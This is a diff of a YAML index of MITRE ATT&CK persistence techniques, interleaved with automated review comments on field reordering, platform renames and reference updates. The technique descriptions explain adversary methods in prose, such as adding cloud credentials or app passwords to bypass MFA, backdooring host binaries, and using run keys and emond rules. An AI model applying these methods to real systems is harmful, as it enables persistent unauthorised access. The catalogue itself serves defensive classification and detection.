+ - source_name: CrowdStrike Outlook Forms
+ description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
+ Movement and Persistence. Retrieved February 5, 2019.
+ url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+ - source_name: GlobalDotName Jun 2019
+ description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+ - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+ url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+ - source_name: Outlook Today Home Page
+ description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+ Retrieved February 5, 2019.
+ url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.001
atomic_tests: []
T1546.009:
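Review bot: `x_mitre_permissions_required` (`User`, `Administrator`) is removed from T1137.001 here and nothing in the re-added block replaces it; any consumer of this index that filters or displays permissions required needs to handle the missing key. The rest of this hunk, together with the removal at the top of the T1137.001 block in the earlier hunk, is a field-order change: `type`, `id`, `created`, `created_by_ref`, `external_references` and `object_marking_refs` move from the start of the technique to the end, with `revoked: false` added and the references reordered, which turns a small semantic change into roughly ninety diff lines. Unrelated to this change, the context line `name: 'Office Application Startup: Office Template Macros.'` carries a trailing period that looks like a typo.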
@@ -37960,7 +38363,7 @@ persistence:
description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
Retrieved December 18, 2017.
source_name: Sysinternals AppCertDlls Oct 2007
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.052Z'
name: 'Event Triggered Execution: AppCert DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -38008,13 +38411,11 @@ persistence:
x_mitre_effective_permissions:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.009
atomic_tests: []
T1098.005:
technique:
- modified: '2023-10-03T17:38:39.065Z'
+ modified: '2024-09-25T20:39:53.597Z'
name: Device Registration
description: "Adversaries may register a device to an adversary-controlled account.
Devices may be registered in a multifactor authentication (MFA) system, which
@@ -38027,16 +38428,16 @@ persistence:
FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
only a username and password to enroll the account's first device or to enroll
a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
- an adversary with existing access to a network may register a device to Azure
- AD and/or its device management system, Microsoft Intune, in order to access
+ an adversary with existing access to a network may register a device to Entra
+ ID and/or its device management system, Microsoft Intune, in order to access
sensitive data or resources while bypassing conditional access policies.(Citation:
AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
- Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+ Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
campaigns via intra-organizational emails, which are less likely to be treated
as suspicious by the email client.(Citation: Microsoft - Device Registration)
Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
- on an Azure AD tenant by registering a large number of devices.(Citation:
+ on an Entra ID tenant by registering a large number of devices.(Citation:
AADInternals - BPRT)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -38048,16 +38449,16 @@ persistence:
- Mike Moran
- Joe Gumke, U.S. Bank
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- Windows
- - SaaS
- x_mitre_version: '1.2'
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Active Directory: Active Directory Object Creation'
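Review bot: `SaaS` is dropped from T1098.005's platforms here (leaving `Windows` and `Identity Provider`), while the T1556.007 and T1078.001 hunks keep `SaaS` alongside the new `Identity Provider` entry; confirm this matches the upstream technique rather than a difference in how the generator mapped the old `Azure AD` platform. The added contributor line and the version bump to 1.3 look consistent with that upstream update.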
@@ -38112,7 +38513,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1542:
technique:
@@ -38173,7 +38573,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.015:
technique:
@@ -38249,7 +38648,7 @@ persistence:
url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
5, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T16:36:37.042Z'
name: 'Boot or Logon Autostart Execution: Login Items'
description: |-
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled
.
@@ -38277,8 +38676,6 @@ persistence:
- 'File: File Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.015
atomic_tests: []
T1205.001:
@@ -38304,7 +38701,7 @@ persistence:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -38329,23 +38726,21 @@ persistence:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1098.001:
technique:
- modified: '2024-02-28T14:35:00.862Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Credentials'
description: "Adversaries may add adversary-controlled credentials to a cloud
account to maintain persistent access to victim accounts and instances within
the environment.\n\nFor example, adversaries may add credentials for Service
Principals and Applications in addition to existing legitimate credentials
- in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
- Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
- both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
- With sufficient permissions, there are a variety of ways to add credentials
- including the Azure Portal, Azure command line interface, and Azure or Az
- PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+ in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+ Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+ include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+ Guidance) With sufficient permissions, there are a variety of ways to add
+ credentials including the Azure Portal, Azure command line interface, and
+ Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
infrastructure-as-a-service (IaaS) environments, after gaining access through
[Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
may generate or import their own SSH keys using either the CreateKeyPair
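Review bot: the only textual change inside the rewrapped description lines is `Azure AD` to `Azure / Entra ID`; the remaining `-`/`+` lines differ only in where the text wraps, which buries a one-term rename under ten changed lines. If the YAML emitter's wrap width changed, say so in the commit message; if not, check whether upstream re-wrapped the description, because the same reflow noise will recur across the file. This hunk also strips `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from the preceding T1205.001 object, so the same "is the key re-added elsewhere" check applies there.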
@@ -38355,11 +38750,15 @@ persistence:
usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command
- in GCP to add access keys to an account. If the target account has different
- permissions from the requesting account, the adversary may also be able to
- escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+ in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile
+ API in AWS to add a password that can be used to log into the AWS Management
+ Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+ Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+ If the target account has different permissions from the requesting account,
+ the adversary may also be able to escalate their privileges in the environment
+ (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
- 2.0) For example, in Azure AD environments, an adversary with the Application
+ 2.0) For example, in Entra ID environments, an adversary with the Application
Administrator role can add a new set of credentials to their application's
service principal. In doing so the adversary would be able to access the service
principal’s roles and permissions, which may be different from those of the
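Review bot: the added CreateLoginProfile text (a console password set on an existing account) and the `Azure AD` to `Entra ID` rename are description-only changes; the object's `x_mitre_detection` text later in this patch still covers only Azure Activity Logs for service principal and application changes and APIs that create or import SSH keys, so the new vector has no matching detection guidance in this object. Because this index mirrors upstream ATT&CK, that gap belongs upstream rather than here, but anyone building detections from `x_mitre_detection` should not read the field as covering the new description text.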
@@ -38370,12 +38769,19 @@ persistence:
tied to the permissions of the original user account. These temporary credentials
may remain valid for the duration of their lifetime even if the original account’s
API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
- Persistence)"
+ Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+ adversaries may be able to add an app password to a user account.(Citation:
+ Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+ legacy devices that do not support multi-factor authentication (MFA), adding
+ an app password can allow an adversary to bypass MFA requirements. Additionally,
+ app passwords may remain valid even if the user’s primary password is reset.(Citation:
+ Microsoft Entra ID App Passwords)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Expel
- Oleg Kolesnikov, Securonix
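Review bot: `x_mitre_attack_spec_version: 3.2.0` is inserted here between `kill_chain_phases` and `x_mitre_contributors`, while a later hunk of this patch removes the identical key and value from the bottom of the same T1098.001 object. That is a key reordering, not a value change; if the generator does not sort keys deterministically, diffs like this will recur on every regeneration and hide the real content change in this hunk (the new app-password paragraph, which is the part defenders care about: MFA bypass and survival across a primary password reset). A stable key order in the emitter would fix this class of churn.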
@@ -38384,6 +38790,7 @@ persistence:
- Alex Soler, AttackIQ
- Dylan Silva, AWS Security
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -38392,13 +38799,16 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- - Azure AD
- SaaS
- x_mitre_version: '2.7'
+ - Identity Provider
+ x_mitre_version: '2.8'
x_mitre_data_sources:
- 'User Account: User Account Modification'
+ - 'Active Directory: Active Directory Object Creation'
+ - 'Active Directory: Active Directory Object Modification'
type: attack-pattern
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
created: '2020-01-19T16:10:15.008Z'
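Review bot: `x_mitre_platforms` drops `Azure AD` and adds `Identity Provider`, and `x_mitre_version` goes `'2.7'` to `'2.8'`. If any per-platform index is derived from this field, T1098.001 moves out of whatever the Azure AD platform fed and into whatever `Identity Provider` maps to, so verify the index generator recognises the new platform name rather than silently dropping the technique. The two added `Active Directory: ...` data sources read as part of the same relabelling and look fine.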
@@ -38424,10 +38834,18 @@ persistence:
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+ - source_name: Lacework AI Resource Hijacking 2024
+ description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+ June 6). Lacework Labs. Retrieved July 1, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
- source_name: GCP SSH Key Add
description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
October 1, 2020.
url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
- source_name: Blue Cloud of Death Video
description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
Azure. Retrieved November 21, 2019.'
@@ -38436,10 +38854,20 @@ persistence:
description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
Azure. Retrieved October 23, 2019.'
url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+ - source_name: Microsoft Entra ID App Passwords
+ description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+ authentication with legacy applications using app passwords. Retrieved May
+ 28, 2024.
+ url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+ - source_name: Mandiant APT42 Operations 2024
+ description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+ Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+ Retrieved May 28, 2024.'
+ url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
- source_name: Expel Behind the Scenes
description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -38456,14 +38884,11 @@ persistence:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.001
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -38538,7 +38963,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.003:
technique:
@@ -38627,24 +39051,27 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.003
atomic_tests: []
T1554:
technique:
- modified: '2024-04-16T13:03:40.824Z'
+ modified: '2024-10-12T16:52:46.067Z'
name: Compromise Host Software Binary
description: |-
Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
- Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.
+ Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
+
+ After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_contributors:
- CrowdStrike Falcon OverWatch
+ - Liran Ravich, CardinalOps
+ - Jamie Williams (U ω U), PANW Unit 42
x_mitre_deprecated: false
x_mitre_detection: "Collect and analyze signing certificate metadata and check
signature validity on software that executes within the environment. Look
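Review bot: the rewritten description line keeps the pre-existing typo `persistence though modifications` (for `through`), present on both the `-` and `+` sides. Since this index mirrors upstream ATT&CK text it should not be hand-edited here, but it is worth reporting upstream. The new `yum-versionlock` / `versionlock.list` sentence is useful for defenders: unexpected entries in that file, or a versionlock invocation on a host where nobody pins packages, are cheap signals to monitor alongside the signature checks already listed under `x_mitre_detection`.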
@@ -38658,7 +39085,7 @@ persistence:
- Linux
- macOS
- Windows
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Deletion'
- 'File: File Modification'
@@ -38673,6 +39100,11 @@ persistence:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1554
external_id: T1554
+ - source_name: Google Cloud Mandiant UNC3886 2024
+ description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+ Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+ Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+ url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
- source_name: Unit42 Banking Trojans Hooking 2022
description: 'Or Chechik. (2022, October 31). Banking Trojan Techniques: How
Financially Motivated Malware Became Infrastructure. Retrieved September
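Review bot: the new `Google Cloud Mandiant UNC3886 2024` reference has a leading space inside its double-quoted description (`" Punsaen Boonyakarn, Shawn Chew, ...`). It is valid YAML but will render as a stray space wherever the citation is displayed; if the space is in the upstream STIX it belongs in an upstream fix, otherwise trim it in the generator.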
@@ -38686,11 +39118,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:27:11.065Z'
name: 'Event Triggered Execution: Change Default File Association'
description: "Adversaries may establish persistence by executing malicious content
triggered by a file type association. When a file is opened, the default program
@@ -38716,7 +39147,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
@@ -38730,7 +39160,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -38757,8 +39186,8 @@ persistence:
url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
- source_name: Microsoft File Handlers
description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
- Retrieved November 13, 2014.
- url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+ Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
- source_name: Microsoft Assoc Oct 2017
description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
7, 2018.
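Review bot: the Microsoft File Handlers reference moves from `http://msdn.microsoft.com/en-us/library/bb166549.aspx` to an `https://learn.microsoft.com/...` URL with a refreshed retrieval date, and the Microsoft Run Key reference gets the same treatment in a later hunk. Good change; the remaining plain `http://` citation URLs in this file (the TLDP Module-HOWTO and LKMPG links in the T1547.006 hunk) are candidates for the same refresh where an https version exists.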
@@ -38769,7 +39198,8 @@ persistence:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.001
atomic_tests: []
T1546.014:
@@ -38810,7 +39240,7 @@ persistence:
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients
, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist
.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T00:16:01.732Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Emond'
x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -38830,12 +39260,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.014
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -38889,11 +39318,10 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547.001:
technique:
- modified: '2023-10-16T09:08:22.319Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
description: |-
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -38980,9 +39408,9 @@ persistence:
in the Registry. Retrieved August 3, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Oddvar Moe RunOnceEx Mar 2018
description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
from Autoruns.exe. Retrieved June 29, 2018.
@@ -38995,12 +39423,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.001
atomic_tests: []
T1136.003:
technique:
- modified: '2024-03-28T16:14:28.678Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Create Account: Cloud Account'
description: |-
Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
@@ -39013,9 +39440,11 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Praetorian
- Microsoft Threat Intelligence Center (MSTIC)
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Collect usage logs from cloud user and administrator accounts
to identify unusual activity in the creation of new accounts and assignment
@@ -39024,13 +39453,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- IaaS
- - Google Workspace
- SaaS
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Creation'
type: attack-pattern
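Review bot: `x_mitre_platforms` for T1136.003 drops `Azure AD`, `Office 365` and `Google Workspace` in favour of `Office Suite` and `Identity Provider`, with `x_mitre_version` `'1.5'` to `'1.6'`. Any per-platform index generated from this field will now omit T1136.003 from the three removed platforms, so confirm the generator maps the two new platform names to the intended index files (or that dropping the technique from those indexes is the intended outcome), since cloud account creation is a persistence technique those indexes previously covered.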
@@ -39078,14 +39507,11 @@ persistence:
url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.003
atomic_tests: []
T1098:
technique:
- modified: '2024-01-16T22:24:38.234Z'
+ modified: '2024-10-15T15:35:57.382Z'
name: Account Manipulation
description: "Adversaries may manipulate accounts to maintain and/or elevate
access to victim systems. Account manipulation may consist of any action that
@@ -39121,16 +39547,15 @@ persistence:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- SaaS
- Network
- Containers
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
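Review bot: the same platform consolidation applies to T1098 (`Azure AD`, `Office 365`, `Google Workspace` removed; `Office Suite`, `Identity Provider` added; `x_mitre_version` `'2.6'` to `'2.7'`). Any index keyed on the old platform names needs the same mapping check, and after the change the parent technique T1098 and its sub-technique T1098.001 should land in the same identity-provider index; a quick diff of the regenerated per-platform CSVs would confirm that.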
@@ -39171,143 +39596,141 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098
atomic_tests: []
T1547.006:
technique:
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-12T17:30:54.170Z'
+ name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+ description: |-
+ Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
+
